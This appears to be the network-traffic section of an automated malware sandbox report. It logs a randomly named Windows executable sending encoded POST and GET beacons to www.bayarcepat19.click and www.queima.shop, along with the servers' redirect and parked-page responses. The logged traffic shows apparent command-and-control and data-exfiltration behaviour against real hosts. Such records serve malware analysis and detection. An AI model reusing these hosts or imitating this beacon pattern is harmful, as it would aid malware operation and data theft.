                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.450033188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:57.774769068 CET10915OUTPOST /5hcm/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/5hcm/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 30 61 4d 65 6c 78 51 45 4b 4c 50 52 4d 74 4a 76 33 6e 44 46 33 61 30 4d 6e 73 59 76 4e 4c 72 4b 6c 64 57 46 7a 62 43 33 70 71 6e 51 44 46 63 46 47 6a 44 52 44 6f 38 51 44 6e 4e 5a 61 31 58 55 6f 77 44 70 36 74 42 75 55 4e 6b 73 70 36 6c 53 69 65 5a 59 75 75 45 31 68 43 44 30 38 63 73 69 2f 48 58 52 46 51 79 4d 4c 35 46 64 2b 73 73 2f 2b 4e 4b 67 46 73 76 75 4a 7a 2b 54 77 51 4f 76 67 48 61 44 34 6d 42 2b 75 65 72 46 65 64 32 48 56 32 61 5a 44 6a 2b 2b 63 2f 78 62 34 46 69 63 31 44 6b 44 39 79 68 2b 63 39 54 6f 32 61 39 62 41 62 35 52 71 59 30 6f 57 6d 32 52 52 61 57 77 42 47 48 6b 7a 70 65 47 4d 56 30 47 55 79 41 55 61 6b 4d 77 33 50 74 53 38 46 54 51 70 4d 65 41 4b 35 55 4d 52 6c 4d 46 66 53 32 4f 46 37 51 6a 32 4f 70 32 4e 4d 48 41 53 48 73 4c 6a 58 31 6d 49 54 71 59 65 56 6c 53 72 78 73 58 56 6c 48 45 70 35 6f 75 6a 53 51 2f 73 31 57 76 4b 70 32 55 69 4c 59 47 58 30 4b 53 58 44 44 6d 67 56 2b 61 48 4b 51 61 79 41 73 7a 61 78 4e 73 4b 56 57 2f 47 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=gNfEDUvgPryzV0aMelxQEKLPRMtJv3nDF3a0MnsYvNLrKldWFzbC3pqnQDFcFGjDRDo8QDnNZa1XUowDp6tBuUNksp6lSieZYuuE1hCD08csi/HXRFQyML5Fd+ss/+NKgFsvuJz+TwQOvgHaD4mB+uerFed2HV2aZDj++c/xb4Fic1DkD9yh+c9To2a9bAb5RqY0oWm2RRaWwBGHkzpeGMV0GUyAUakMw3PtS8FTQpMeAK5UMRlMFfS2OF7Qj2Op2NMHASHsLjX1mITqYeVlSrxsXVlHEp5oujSQ/s1WvKp2UiLYGX0KSXDDmgV+aHKQayAszaxNsKVW/GjdmBrG8oAeUDi4ziECcDty8yuf7+wJ4IdkOdgdG90X7/r5mi/zzyuH7dnXKrQk+u0ceARwjFAySaIW1IRKXERhvbxEtgLhLn+xxTUFQ+bN2LE+rXEhN5IioXIUgDzF5DiQvNtyRS8sTYe1J0C2SfX1SQ+UNKfO0EpL7v7ocEMKsdTpXGeXuk08vgU5LpEJHwtE2o3sMzucOFDNiNXjn0RL1kg2Cffry4cMVCgnw6DsK6i9hh2aSk9z1zkXSz5Y3F+SuXXoIKuGkfTrXdma3dd31wN9BRnIUIWPlNtLveouHyv0VlE544fjT7f6lOKrS7IatFoyG/TXufN1CqItR9rE1jQLUF/rXSwjdxrdhiFlI7mLfOaGVJr0E4uUpNcT+hMG+CUdw63qj6kLZBGbyzEJbjDGkCRXxF1ipeFZ9K0cbMRxFT1ZsZg2LtRbKf+vk5MJldYl6wr1ygLW1/gx4Rx/k+n9mpqTdqdMUX6gMovMp3nUEPkQGM4NkYk4c2ccGuimxlRF3hcool1F2LGxKZ2aIZVORr1Q5mo1dqObRp4nyaWL5yMnK5xiWMJ8WcjivRiuLCeTcuIqLgyrzcCz9yLP6azW0Kb17j9ZNn0bx8cDMh1kDg3GDAlqAb4S06cJWC/1KUUh0oXAwT79vw7pdklInvcWV20CqGxp [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:00:58.396493912 CET1038INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:58 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Sat, 02 Nov 2024 20:00:58 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/5hcm/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aX9iQHKK5FJPVPZ1mVOafeIKAbSlqdFh%2BTbcb2yT3%2BPLQNgQyGwap6OJiuvfdwxbVqG7IlaOCwC%2FlVu%2FhnAulqX7ERUahZsiXf2h5XuC9T886TXUPKwt8FG4j2iz6rVIx4PcD3%2B4tqvj"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65ed87bca0c17-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1664&sent=4&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10915&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.450034188.114.97.3803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:00.329298019 CET536OUTGET /5hcm/?InQ=tP3kAkfnE7i1YCC4WEIWdKvNUvpS22y5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUkjVwGn+C/bAHUZtb03BGjpac+p+rsaDZJI6Y=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:01:01.003113985 CET1149INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Sat, 02 Nov 2024 20:01:00 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/5hcm/?InQ=tP3kAkfnE7i1YCC4WEIWdKvNUvpS22y5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUkjVwGn+C/bAHUZtb03BGjpac+p+rsaDZJI6Y=&4b0dM=fDYPF
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtLlX3ZUTR86a3mhKk7rAUz5wo2cFZEtr4UIOFFNdB2jQRS6FSnhJnPHiAHo%2Bw%2BkVV%2F5N1Pbhg64Mvg06ldI%2B%2FH5AiCEPRy3B7rFrtH6fjmd9Cm2N6fm1h1GSCELYdFx1dKobXMeg4uW"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8dc65ee8884e6b59-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=536&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.45003584.32.84.32803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:06.121818066 CET792OUTPOST /ka9h/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.queima.shop
                                                                                                                    Origin: http://www.queima.shop
                                                                                                                    Referer: http://www.queima.shop/ka9h/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 66 44 73 54 61 33 31 37 31 56 6d 52 70 6b 41 45 61 70 6f 38 68 4d 4b 32 37 35 6a 63 6d 53 76 56 75 49 4e 77 35 4a 49 71 4f 62 72 50 64 73 52 72 61 35 74 31 38 65 70 51 54 6c 69 4a 53 61 45 37 47 45 54 35 59 54 6f 74 73 34 4e 4e 50 74 48 4a 45 6b 39 2f 31 61 50 4c 77 48 58 32 47 36 5a 6e 49 37 38 55 4d 63 55 72 46 39 78 42 41 71 2f 67 48 43 59 4f 53 6a 4e 47 76 74 4e 2b 4b 50 6d 63 6b 43 4d 37 38 4c 76 64 69 4b 42 68 57 51 6e 54 54 55 67 41 63 2b 54 44 64 4e 30 47 50 34 69 5a 45 36 36 72 6c 6a 2b 38 6a 45 72 72 58 4c 65 69 2f 4e 4d 49 46 6c 35 31 41 72 78 52 43 68 58 44 51 41 3d 3d
                                                                                                                    Data Ascii: InQ=fDsTa3171VmRpkAEapo8hMK275jcmSvVuINw5JIqObrPdsRra5t18epQTliJSaE7GET5YTots4NNPtHJEk9/1aPLwHX2G6ZnI78UMcUrF9xBAq/gHCYOSjNGvtN+KPmckCM78LvdiKBhWQnTTUgAc+TDdN0GP4iZE66rlj+8jErrXLei/NMIFl51ArxRChXDQA==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.45003684.32.84.32803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:08.661185026 CET812OUTPOST /ka9h/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.queima.shop
                                                                                                                    Origin: http://www.queima.shop
                                                                                                                    Referer: http://www.queima.shop/ka9h/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 66 44 73 54 61 33 31 37 31 56 6d 52 6f 46 51 45 4a 61 41 38 77 38 4b 31 30 5a 6a 63 77 69 76 52 75 49 52 77 35 4e 52 79 62 2b 7a 50 64 4e 68 72 62 37 46 31 39 65 70 51 63 46 69 49 57 61 45 4b 47 45 65 47 59 53 55 74 73 35 74 4e 50 6f 37 4a 45 58 46 2b 30 4b 50 7a 70 33 58 30 4a 61 5a 6e 49 37 38 55 4d 63 6f 56 46 38 5a 42 41 61 50 67 47 6a 59 4e 63 44 4e 46 2f 64 4e 2b 4f 50 6d 59 6b 43 4d 4e 38 4b 7a 6e 69 4a 35 68 57 52 58 54 54 46 67 44 48 75 54 46 5a 4e 31 76 41 71 2b 55 43 70 48 62 36 51 71 7a 68 33 44 6d 62 74 50 34 75 38 74 66 58 6c 64 47 64 73 34 6c 50 69 71 4b 4c 42 39 73 30 6f 4b 43 50 31 31 33 51 59 62 63 68 46 63 75 2f 68 51 3d
                                                                                                                    Data Ascii: InQ=fDsTa3171VmRoFQEJaA8w8K10ZjcwivRuIRw5NRyb+zPdNhrb7F19epQcFiIWaEKGEeGYSUts5tNPo7JEXF+0KPzp3X0JaZnI78UMcoVF8ZBAaPgGjYNcDNF/dN+OPmYkCMN8KzniJ5hWRXTTFgDHuTFZN1vAq+UCpHb6Qqzh3DmbtP4u8tfXldGds4lPiqKLB9s0oKCP113QYbchFcu/hQ=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.45003784.32.84.32803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:11.211396933 CET10894OUTPOST /ka9h/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.queima.shop
                                                                                                                    Origin: http://www.queima.shop
                                                                                                                    Referer: http://www.queima.shop/ka9h/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 66 44 73 54 61 33 31 37 31 56 6d 52 6f 46 51 45 4a 61 41 38 77 38 4b 31 30 5a 6a 63 77 69 76 52 75 49 52 77 35 4e 52 79 62 2b 37 50 64 2f 70 72 64 64 4e 31 36 65 70 51 43 31 69 4e 57 61 45 74 47 45 47 4b 59 53 59 69 73 39 64 4e 4a 4b 6a 4a 43 6d 46 2b 36 4b 50 7a 30 48 58 70 47 36 5a 49 49 37 4e 64 4d 63 59 56 46 38 5a 42 41 59 58 67 42 79 59 4e 52 6a 4e 47 76 74 4d 2f 4b 50 6e 46 6b 44 6f 64 38 4b 6e 33 68 34 5a 68 57 79 76 54 53 7a 63 44 61 2b 54 48 65 4e 31 33 41 71 7a 55 43 70 4b 69 36 52 76 65 68 30 66 6d 4c 59 7a 76 74 64 5a 56 4d 32 4e 67 47 4e 56 46 44 51 69 39 50 42 4a 59 37 4b 32 2b 54 45 42 6d 51 4a 79 73 36 48 38 46 6d 58 35 6b 4c 2b 48 46 32 33 46 34 50 48 58 4f 4a 49 49 74 5a 4b 6b 32 77 67 66 42 68 68 38 41 65 45 63 4d 6d 58 76 73 6b 56 39 4a 38 79 31 38 41 4a 51 34 36 4d 52 42 75 65 5a 67 6b 78 42 32 75 47 43 58 6b 48 70 6f 41 6c 6b 52 58 72 63 77 75 2f 63 69 6d 6d 62 34 74 35 48 64 58 6d 55 51 62 4d 72 32 65 4b 4a 67 64 75 74 74 74 64 76 46 61 6e 78 35 64 51 30 43 6c 4a [TRUNCATED]
                                                                                                                    Data Ascii: InQ=fDsTa3171VmRoFQEJaA8w8K10ZjcwivRuIRw5NRyb+7Pd/prddN16epQC1iNWaEtGEGKYSYis9dNJKjJCmF+6KPz0HXpG6ZII7NdMcYVF8ZBAYXgByYNRjNGvtM/KPnFkDod8Kn3h4ZhWyvTSzcDa+THeN13AqzUCpKi6Rveh0fmLYzvtdZVM2NgGNVFDQi9PBJY7K2+TEBmQJys6H8FmX5kL+HF23F4PHXOJIItZKk2wgfBhh8AeEcMmXvskV9J8y18AJQ46MRBueZgkxB2uGCXkHpoAlkRXrcwu/cimmb4t5HdXmUQbMr2eKJgdutttdvFanx5dQ0ClJDOgOsivAjkRdJ81PUFzAa9hy6D+EyWPTHp2FMNAovI91B2/PtVGSo5UE1EriIyYt7XP/Ik5zsrZ3BiscvEtVkphu2C4T1jE50FDSOvfNXA1MOgrSlXNN276cVk95MdNmDrGu2RleswzcFKGOBare+DLQNfSu1I9SqAqM5iwFMWQT+79RW3THEIYJIqf1QNTkFaSZlPRzvcpvZBJFYMSoNy6gwDobh3N7n+m4MJXYB/lI9QfITZoO8zSnaxVo42gZat4oOEEwacqiqhSKMArEhFmhLG37r9qMU1IKXuVFDu7ikthDwZtZ9Lm1bNa9IYev2R86a6O3owhL8UCZPWMQTN1SZxSjwM1J9hz1CcJ9jxV4k3Ms6wygdBFqNyPHw4cgUbeoFOpyYRVX3MuRgn9E6JhNsZClvLD12kw4daZPp7Tk/cneqTbu6zTkNUcjpX2Auhq0qrUrZNzqe3uTp8a6WIjwBP6wRvWYM4aLm+JTgTgYptjA9CxexwSzLifNL9oThEmYyeYV6HiC95mME341ZD0tNpYQg2uoPETICpALJaxaczJfS1zG6U53FbZJSSFRlwpz+Kot+YL63JBH/1IWFG3LwSE1U8LNmeP+Io0OMMreuCRhJif+a6Fa+p6DQkUe40uSZiMw7WoDQ422tvbNd7+IAkrYOjKKAP [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.45003884.32.84.32803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:13.754062891 CET529OUTGET /ka9h/?InQ=SBEzZAFI6R+MuXMHep45hveg8475zASMotQq88crLJjLaeo0XbFH+bdZbQqsHZwXBgGMZiEh6f1TBI/WO30Y7KSm1k/3EoEdIY5bKrw0daRcPqXkB0ATUTg=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.queima.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:01:14.572350025 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: hcdn
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 10072
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    x-hcdn-request-id: 3c5e2923883fdc8e47372e6dd74eee04-int-edge3
                                                                                                                    Expires: Sat, 02 Nov 2024 19:01:13 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                    Nov 2, 2024 20:01:14.572371006 CET1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                    Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                                    Nov 2, 2024 20:01:14.572387934 CET424INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                                    Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                                    Nov 2, 2024 20:01:14.572402000 CET1236INData Raw: 70 78 20 30 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 62 61 73 65 6c 69 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67
                                                                                                                    Data Ascii: px 0;align-items:baseline;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.secti
                                                                                                                    Nov 2, 2024 20:01:14.572415113 CET1236INData Raw: 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69
                                                                                                                    Data Ascii: container{margin-top:30px}.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-
